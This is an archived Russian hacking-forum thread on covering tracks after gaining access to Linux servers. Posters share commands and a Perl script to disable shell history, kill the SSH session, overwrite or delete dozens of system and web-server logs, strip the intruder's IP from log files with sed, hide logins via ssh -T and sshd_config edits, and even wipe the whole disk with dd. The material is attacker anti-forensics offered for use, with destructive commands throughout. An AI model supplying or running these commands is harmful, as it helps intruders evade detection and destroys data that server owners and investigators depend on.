PDA

Просмотр полной версии : Чистим следы


br3d
30.07.2014, 17:10
Отключаем историю set +o history (set -o history если надо сново включить)


Если не вышло отключить history по хорошему, делаем так ln –s /dev/null .bash_history


Если поставить пробел перед командой, то в history она не отобразится


Завершаем свой сеанс убийством процесса sshd созданного для нас (kill -9 $$), иначе если закрыть консольное окно или выйти по Ctrl+D останемся в логах


Для чистки логов можно использовать whitecat знает большинство путей популярных дистрибов в отличие от других лог клинеров не требует дополнительных либ, компилится без проблем.


У кого есть что дополнить ?

-Gory King-
31.07.2014, 13:58
@files = qw(
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log.1
/etc/httpd/logs/access_log.2
/etc/httpd/logs/access_log.3
/etc/httpd/logs/access_log.4
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log.1
/etc/httpd/logs/error_log.2
/etc/httpd/logs/error_log.3
/etc/httpd/logs/error_log.4
/usr/local/apache/logs/error_log
/usr/local/apache/logs/suexec_log
/etc/httpd/logs/modsec_audit.log
/etc/httpd/logs/modsec_debug.log
/var/log/httpd/error_log
/var/log/apache2/error.log
/var/log/httpd-error.log
/var/log/mysqld.log
/var/log/secure
/var/log/utmp
/var/log/wtmp
/var/log/yum.log
/var/log/Xorg.0.log
/var/log/wvdialconf.log
/var/log/user.log
/var/log/pycentral.log
/var/log/mail.log
/var/log/apport.log
/var/bootstrap.log
/var/log/daemon.log
/var/log/dpkg.log
/var/log/fontconfig.log
/var/log/lpr.log
/var/log/maillog
/var/log/messages
/usr/local/apache/domlogs/ftpxferlog
/var/log/xferlog
/var/log/chkservd.log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/var/log/auth.log
/var/log/kern.log
/var/log/cron.log
/var/log/boot.log
/var/log/auth.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/nctfpd.errs
/var/log/httpsd/ssl.access_log
/var/log/ncftpd/misclog.txt
/var/log/nctfpd.errs
);
foreach $files (@files){
open (LOG_FILE , "<$files");
print LOG_FILE " ";
}
print "\n\n [+] Server Logs Cleaned Succesfully ! \n\n";
}

br3d
31.07.2014, 16:48
Хороший список путей для проверки логов !
но, я так понял (перл слабо знаю) он логи полностью трет(

tex
31.07.2014, 17:36
Если не вышло отключить history по хорошему, делаем так ln –s /dev/null .bash_history


Так это тоже трет все логи) И как думаешь удивиться админ увидя у себя слинкованные хистори )

не вышло если не вышло - надо разбираться почему не вышло. В bash, sh и ksh например есть переменная HISTFILE, можно ее исправить, если пустая- то ни куда не пишется.


если все тереть то уж проще и главное надежнее так :
find /var/log/ -type f -exec shred -u {} \;

-Gory King-
31.07.2014, 18:22
Ище вариант

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

madhatter
01.08.2014, 10:57
Хорошие у вас, однако, способы чистки логов. Нет логов - нет проблем. То есть, вообще нет логов. unset HISTFILE(без $ в начале) и чистка логов клинерами после.

b3
01.08.2014, 18:24
мда...

Диагноз
01.08.2014, 19:35
Чищу логи через
dd if=/dev/zero of=/dev/sda

dotr
02.08.2014, 10:56
Ище вариант

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


Национальный метод решения проблемы. Вроде все и почищено , но и админ видит что кто-то насрал большую кучу говна...

br3d
04.08.2014, 15:48
Хорошие у вас, однако, способы чистки логов. Нет логов - нет проблем. То есть, вообще нет логов. unset HISTFILE(без $ в начале) и чистка логов клинерами после.

хотели как лучше, а кончилось как всегда... (

dikiy
16.08.2014, 23:05
ssh -T - в .bash_history, utmp, lastlog не попадаем.

Далее grep -rl 'ip' /var/log | while read F; do cp $F /tmp/$F; sed -i '/ip/d' /tmp/$F; cat /tmp/$F > /var/log/$F; rm -f /tmp/$F; done

edam
29.08.2014, 23:59
тогда уже вместо ip
`env | grep SSH_CLIENT | grep -Po "[\d.]{8,}"`

NiNjA
31.08.2015, 11:32
Всегда делаю вот так:
unset HISTFILE && exit


и ещё полезного:
rm -rf /var/log/wtmp
sudo sed -i "s/PrintLastLog .*/PrintLastLog no/1" /etc/ssh/sshd_config
warning: /var/log/auth.log
warning: /var/log/last.log

slashd
31.08.2015, 14:57
Всегда делаю вот так:
unset HISTFILE && exit


и ещё полезного:
rm -rf /var/log/wtmp
sudo sed -i "s/PrintLastLog .*/PrintLastLog no/1" /etc/ssh/sshd_config
warning: /var/log/auth.log
warning: /var/log/last.log

Забыл перезагрузить сервис sshd. Предлагаю сразу передать в sshd_config привет админу в комментариях :good3:

CookJessica
28.11.2018, 13:08
ssh -T - в .bash_history, utmp, lastlog не попадаем.

Далее grep -rl 'ip' /var/log | while read F; do cp $F /tmp/$F; sed -i '/ip/d' /tmp/$F; cat /tmp/$F > /var/log/$F; rm -f /tmp/$F; done

man ssh:
-T Disable pseudo-terminal allocation.

чекнул ласт, действительно работает :) спасибо!